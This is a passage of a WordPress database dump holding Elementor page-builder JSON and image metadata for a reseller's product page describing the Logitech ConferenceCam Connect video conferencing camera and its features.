bag.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4790097\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4216c7d\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/Z9jk_qlVlTY\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ee352b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ef1f433\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"90274d6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-connect-1.jpg\",\"id\":2945}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"cca09b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e4e8a6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>COMPATIBLE WITH MOST VC APPS<\\/h3><p>Connect offers a plug-and-play USB connection to Windows and Mac computers and Chromebooks\\u2122, and is certified for Skype for Business, Cisco Jabber\\u2122 compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aadf8ee\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"dd5dc87\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f09d46b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PREMIUM CAMERA LENS<\\/h3><p>Connect features a premium glass lens for maximum clarity. Enjoy bright, clear video with accurate color rendition and sharpness, even when zoomed in. Easily protect the lens from dust and scratches by docking the magnetic remote control.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"058691e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"db09290\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-connect-2.jpg\",\"id\":2946}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fc6c046\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"77dd32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b513fa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f8cd62\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"f1c0ab7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2a607f9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EASY AUDIO CONFERENCING<\\/h4><p>Dialing into an audio conference? Already connected on your smartphone? Simply pair Connect via either Bluetooth\\u00ae or NFC to enjoy outstanding audio clarity, volume, and dynamic range. Connect features two omnidirectional microphones and 360\\u00b0 wideband audio so everyone can hear and be heard.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"36e848e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f79b7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PORTABLE POWER<\\/h4><p>Designed for convenient portability, Connect boasts an internal, rechargeable battery that can run video calls for up to 3 hours, and audio calls for up to 15 hours. Or, power Connect with the included AC power supply: swappable regional plugs (included) make it easy to to power and charge around the world.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f0e6006\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e528c51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>USB PLUG-AND-PLAY CONNECTIVITY<\\/h4><p>With no special software, training, or maintenance required, launching an enterprise-quality videoconference has never been easier. Simply plug Connect into your PC, Mac, or Chromebook: it works as both a webcam and an audio device with your video conferencing software.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef047c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05d1ccf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SAFE AND SECURE<\\/h4><p>Connect\\u2019s remote control docks over the lens, providing an extra level of privacy. And when you want Connect to stay put, the Kensington security slot offers simple protection from theft.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5537,2944,'_elementor_edit_mode','builder'),(5538,2944,'_elementor_template_type','post'),(5539,2944,'_wp_page_template','elementor_header_footer'),(5541,2944,'_elementor_data','[{\"id\":\"f6621d9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2da5e02\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"87f6a4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>CONNECT<\\/p><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p><ul><li>Superior video and audio with a compact, 76 mm footprint<\\/li><li>Works with your meeting and video conferencing applications<\\/li><li>Plug-free mobility with rechargeable battery<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"10baf7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9c4b53d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-connect-1.png\",\"id\":2942}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f84517f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"437c30b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e53080b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>FLEXIBLE VIDEO FOR THE ANYWHERE WORKPLACE<\\/h2><p>Simplify video conferencing so anyone can set it up and run a meeting anywhere. Make it affordable so you can outfit every conference room with video. Designed for huddle rooms and home offices, Logitech Connect is also compact and mobile so you can take it throughout the workplace and around the world. Connect is always ready for your next video conference call.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b8b9cc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8894872\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"861f800\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ad441\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c0fd569\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"43abcba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-connect.jpg\",\"id\":2943}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ebc7db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c3d7d21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR SMALL SPACES<\\/h3><p>Logitech Connect goes beyond its award winning design \\u2014 video conferencing so simple to use that anyone can set it up and so affordable you can enable every meeting room with video. Designed for tabletop placement and small spaces, this video conference solution offers a generous 90\\u00b0 field-of-view with pan and tilt, 4x zoom, and razor-sharp optics making it easy to see everyone in the room.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce664\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"31d6359\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f8283bd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>COMPACT ALL-IN-ONE DESIGN<\\/h3><p>Take video conferencing on the go. Carry Connect from meeting to meeting, or pack it when traveling so you never miss the opportunity to meet face to face. With a tabletop footprint just 3 inches (75 mm) across, Connect fits just about anywhere. Even the handheld remote is designed for easy portability, docking as a lens cover so you won\\u2019t lose it in your bag.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4790097\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4216c7d\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/Z9jk_qlVlTY\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(5542,2940,'_elementor_version','0.4'),(5545,2945,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.598949394081241592857622890733182430267333984375;s:5:\"bytes\";i:12112;s:11:\"size_before\";i:96135;s:10:\"size_after\";i:84023;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:409;s:11:\"size_before\";i:5214;s:10:\"size_after\";i:4805;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.53999999999999914734871708787977695465087890625;s:5:\"bytes\";i:780;s:11:\"size_before\";i:8178;s:10:\"size_after\";i:7398;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.6699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:4369;s:11:\"size_before\";i:29791;s:10:\"size_after\";i:25422;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.5;s:5:\"bytes\";i:819;s:11:\"size_before\";i:8618;s:10:\"size_after\";i:7799;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.0299999999999993605115378159098327159881591796875;s:5:\"bytes\";i:2207;s:11:\"size_before\";i:18350;s:10:\"size_after\";i:16143;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.5800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:3528;s:11:\"size_before\";i:25984;s:10:\"size_after\";i:22456;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(5546,2946,'_wp_attached_file','2019/03/conferencecam-connect-2.jpg'),(5547,2946,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:35:\"2019/03/conferencecam-connect-2.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"conferencecam-connect-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"conferencecam-connect-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"conferencecam-connect-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:35:\"conferencecam-connect-2-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:35:\"conferencecam-connect-2-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:35:\"conferencecam-connect-2-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:33:\"conferencecam-connect-2-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5548,2946,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.7611964855704371757383341901004314422607421875;s:5:\"bytes\";i:7756;s:11:\"size_before\";i:60778;s:10:\"size_after\";i:53022;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:413;s:11:\"size_before\";i:4193;s:10:\"size_after\";i:3780;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:660;s:11:\"size_before\";i:5249;s:10:\"size_after\";i:4589;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:2689;s:11:\"size_before\";i:19226;s:10:\"size_after\";i:16537;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.4399999999999995026200849679298698902130126953125;s:5:\"bytes\";i:673;s:11:\"size_before\";i:4662;s:10:\"size_after\";i:3989;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.25;s:5:\"bytes\";i:1341;s:11:\"size_before\";i:10944;s:10:\"size_after\";i:9603;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:12;s:5:\"bytes\";i:1980;s:11:\"size_before\";i:16504;s:10:\"size_after\";i:14524;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5550,2947,'_elementor_edit_mode','builder'),(5551,2947,'_elementor_template_type','post'),(5552,2947,'_wp_page_template','elementor_header_footer'),(5553,2947,'_elementor_data','[{\"id\":\"f6621d9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2da5e02\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"87f6a4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONNECT<\\/h2><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p><ul><li>Superior video and audio with a compact, 76 mm footprint<\\/li><li>Works with your meeting and video conferencing applications<\\/li><li>Plug-free mobility with rechargeable battery<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"10baf7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9c4b53d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-connect-1.png\",\"id\":2942},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f84517f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"437c30b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e53080b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>FLEXIBLE VIDEO FOR THE ANYWHERE WORKPLACE<\\/h2><p>Simplify video conferencing so anyone can set it up and run a meeting anywhere. Make it affordable so you can outfit every conference room with video. Designed for huddle rooms and home offices, Logitech Connect is also compact and mobile so you can take it throughout the workplace and around the world. Connect is always ready for your next video conference call.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b8b9cc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8894872\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"861f800\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ad441\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c0fd569\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"43abcba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-connect.jpg\",\"id\":2943}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ebc7db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c3d7d21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR SMALL SPACES<\\/h3><p>Logitech Connect goes beyond its award winning design \\u2014 video conferencing so simple to use that anyone can set it up and so affordable you can enable every meeting room with video. Designed for tabletop placement and small spaces, this video conference solution offers a generous 90\\u00b0 field-of-view with pan and tilt, 4x zoom, and razor-sharp optics making it easy to see everyone in the room.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce664\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"31d6359\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f8283bd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>COMPACT ALL-IN-ONE DESIGN<\\/h3><p>Take video conferencing on the go. Carry Connect from meeting to meeting, or pack it when traveling so you never miss the opportunity to meet face to face. With a tabletop footprint just 3 inches (75 mm) across, Connect fits just about anywhere. Even the handheld remote is designed for easy portability, docking as a lens cover so you won\\u2019t lose it in your bag.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4790097\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4216c7d\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/Z9jk_qlVlTY\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ee352b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ef1f433\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"90274d6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-connect-1.jpg\",\"id\":2945}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"cca09b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e4e8a6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>COMPATIBLE WITH MOST VC APPS<\\/h3><p>Connect offers a plug-and-play USB connection to Windows and Mac computers and Chromebooks\\u2122, and is certified for Skype for Business, Cisco Jabber\\u2122 compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aadf8ee\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"dd5dc87\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f09d46b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PREMIUM CAMERA LENS<\\/h3><p>Connect features a premium glass lens for maximum clarity. Enjoy bright, clear video with accurate color rendition and sharpness, even when zoomed in. Easily protect the lens from dust and scratches by docking the magnetic remote control.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"058691e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"db09290\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-connect-2.jpg\",\"id\":2946}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fc6c046\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"77dd32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b513fa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f8cd62\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"f1c0ab7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2a607f9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EASY AUDIO CONFERENCING<\\/h4><p>Dialing into an audio conference? Already connected on your smartphone? Simply pair Connect via either Bluetooth\\u00ae or NFC to enjoy outstanding audio clarity, volume, and dynamic range. Connect features two omnidirectional microphones and 360\\u00b0 wideband audio so everyone can hear and be heard.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"36e848e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f79b7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PORTABLE POWER<\\/h4><p>Designed for convenient portability, Connect boasts an internal, rechargeable battery that can run video calls for up to 3 hours, and audio calls for up to 15 hours. Or, power Connect with the included AC power supply: swappable regional plugs (included) make it easy to to power and charge around the world.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f0e6006\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e528c51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>USB PLUG-AND-PLAY CONNECTIVITY<\\/h4><p>With no special software, training, or maintenance required, launching an enterprise-quality videoconference has never been easier. Simply plug Connect into your PC, Mac, or Chromebook: it works as both a webcam and an audio device with your video conferencing software.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef047c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05d1ccf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SAFE AND SECURE<\\/h4><p>Connect\\u2019s remote control docks over the lens, providing an extra level of privacy. And when you want Connect to stay put, the Kensington security slot offers simple protection from theft.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5554,2947,'_elementor_version','0.4'),(5557,2948,'_elementor_edit_mode','builder'),(5558,2948,'_elementor_template_type','post'),(5559,2948,'_wp_page_template','elementor_header_footer'),(5560,2948,'_elementor_data','[{\"id\":\"f6621d9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2da5e02\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"87f6a4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONNECT<\\/h2><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p><ul><li>Superior video and audio with a compact, 76 mm footprint<\\/li><li>Works with your meeting and video conferencing applications<\\/li><li>Plug-free mobility with rechargeable battery<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"10baf7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9c4b53d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-connect-1.png\",\"id\":2942},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f84517f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"437c30b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e53080b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>FLEXIBLE VIDEO FOR THE ANYWHERE WORKPLACE<\\/h2><p>Simplify video conferencing so anyone can set it up and run a meeting anywhere. Make it affordable so you can outfit every conference room with video. Designed for huddle rooms and home offices, Logitech Connect is also compact and mobile so you can take it throughout the workplace and around the world. Connect is always ready for your next video conference call.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b8b9cc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8894872\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"861f800\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ad441\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c0fd569\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"43abcba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-connect.jpg\",\"id\":2943}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ebc7db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c3d7d21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR SMALL SPACES<\\/h3><p>Logitech Connect goes beyond its award winning design \\u2014 video conferencing so simple to use that anyone can set it up and so affordable you can enable every meeting room with video. Designed for tabletop placement and small spaces, this video conference solution offers a generous 90\\u00b0 field-of-view with 